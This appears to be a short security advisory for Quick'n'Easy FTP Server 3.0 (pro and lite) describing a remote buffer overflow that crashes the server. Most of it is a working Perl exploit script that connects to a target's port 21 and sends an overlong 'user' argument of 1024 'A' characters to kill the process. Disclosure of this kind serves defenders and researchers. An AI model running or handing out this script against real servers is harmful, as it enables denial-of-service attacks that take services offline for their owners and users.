Quick'n'Easy FTP server 3.0 pro and lite suffer from a remote buffer overflow vulnerability that can result in a denial of service.
9a64dafde7563903ef2ed2c64e250221bbb96477a2c523f5eb5c27068a9064d2
Details:
========
Input to the user commands is not properly checked
and/or filtered. Issuing a long argument to the user (about 1024 caracteres)
commands will cause the corresponding process to die without any error message.
this vulnerabilities exist in both the professionnal version 3.0 and lite version 3.0
Exploits:
========
Run the following PERL script against the server. The corresponding
process will die.
#=====testserver.pl =====
#
# Usage: testserver.pl <ip>
# testserver.pl 127.0.0.1
# bug discovered by : matiteman
# exploit coded by : matiteman
# thanks to : Reed Arvin (peachfuzz)
# Quick 'n Easy FTP Server 3.0 (pro and lite)
# Download:
# http://www.pablosoftwaresolutions.com/
#
##########################################
use IO::Socket;
use strict;
my($socket) = "";
if ($socket = IO::Socket::INET->new(PeerAddr => $ARGV[0],
PeerPort => "21",
Proto => "TCP"))
{
print "Attempting to kill Quick 'n Easy FTP Server 3.0 (pro / lite) at $ARGV[0]:21...\n";
sleep(1);
print $socket "user " . "A" x 1024 . "\r\n";
sleep(1);
close($socket);
}
else
{
print "Cannot connect to $ARGV[0]:21\n";
}
#===== testserver.pl =====